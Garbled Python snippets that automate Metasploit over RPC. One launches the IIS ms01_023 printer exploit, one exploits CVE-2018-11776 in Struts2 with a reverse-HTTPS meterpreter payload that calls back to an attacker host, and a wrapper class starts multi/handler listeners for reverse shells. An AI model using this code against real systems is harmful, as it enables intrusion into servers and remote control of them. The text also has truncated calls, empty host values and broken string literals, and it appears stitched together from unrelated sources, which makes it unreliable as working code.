def msfrpc(self, job): from metasploit.msfrpc import MsfRpcClient, MsfRpcError res = '' try: msf = MsfRpcClient('123456') print msf.db.connect( 'msf', database='msf', host='', password='******') print msf.db.status exp = msf.modules.use('exploit', 'windows/iis/ms01_023_printer') exp['RHOST'] = '' exp['RPORT'] = 80 exp['VERBOSE'] = True res = exp.execute() print'db.hosts', {}) print'', {}) except socket.error as ex: res = ex.strerror return res except MsfRpcError as ex: res = ex.message return res return res
def sploiter(RHOST, LHOST, LPORT, session): client = MsfRpcClient('passwd', server="", ssl=False) ress ='console.create') console_id = ress['id'] ## Exploit CVE-2018-11776 commands = """use exploit/multi/http/struts2_rest_xstream set PAYLOAD linux/x64/meterpreter_reverse_https set RHOST """ + RHOST + """ set LHOST """ + LHOST + """ set LPORT """ + LPORT + """ set ExitOnSession false exploit -z """ print("[+] Exploiting CVE-2018-11776 on: " + RHOST)'console.write', [console_id, commands]) res ='', [console_id]) result = res['data'].split('n')
class MsfClient(object): def __init__(self, config, db_connect=True): self.config = configparser.ConfigParser() self._rpc_connect() self.lock = Lock() if self.config.has_section("globals"): for g, v in self.config["globals"].items(): if v: self.rpc.core.setg(g, v) else: self.rpc.core.unsetg(g) if self.config.has_section("database"): if self.config.has_option("database", "yml") and self.config.has_option( "database", "yml_config"): with open(self.config.get("database", "yml")) as f: conf = yaml.load(f) db_conf = conf[self.config.get("database", "yml_config")] for i in ["username", "password", "host", "port", "database"]: # copy yml config values over to config if db_conf.get(i, None): self.config["database"][i] = str(db_conf[i]) if db_connect: self._db_connect() def _db_connect(self): connected = self.rpc.db.connect( self.config.get("database", "username"), host=self.config.get("database", "host"), password=self.config.get("database", "password"), port=self.config.getint("database", "port"), database=self.config.get("database", "database")) if not connected: raise Exception("Could not connect to the database") def _rpc_connect(self): self.rpc = MsfRpcClient(self.config.get("rpc", "password"), verify=False, username=self.config.get("rpc", "username"), port=self.config.getint("rpc", "port"), server=self.config.get("rpc", "host"), ssl=self.config.getboolean("rpc", "ssl")) def db_hosts(self, **kwargs): return'db.hosts', kwargs) def db_services(self, **kwargs): return'', kwargs) def call(self, query, opts): self.lock.acquire() try: return, opts) except MsfRpcError as e: raise MsfRpcError(str(e)) finally: self.lock.release() def start_handler(self, lhost, lport, payload, exitonsession=False, auto_run=None): l = self.rpc.modules.use('exploit', 'multi/handler') l._runopts['LHOST'] = lhost l._runopts['LPORT'] = lport l['ExitOnSession'] = exitonsession l._runopts['DisablePayloadHandler'] = 'false' l._runopts['PAYLOAD'] = payload if auto_run: l._runopts['AutoRunScript'] = auto_run if l.execute()['job_id']: print("Handler {} started on {}:{}".format(payload, lhost, lport)) else: print("Handler not started")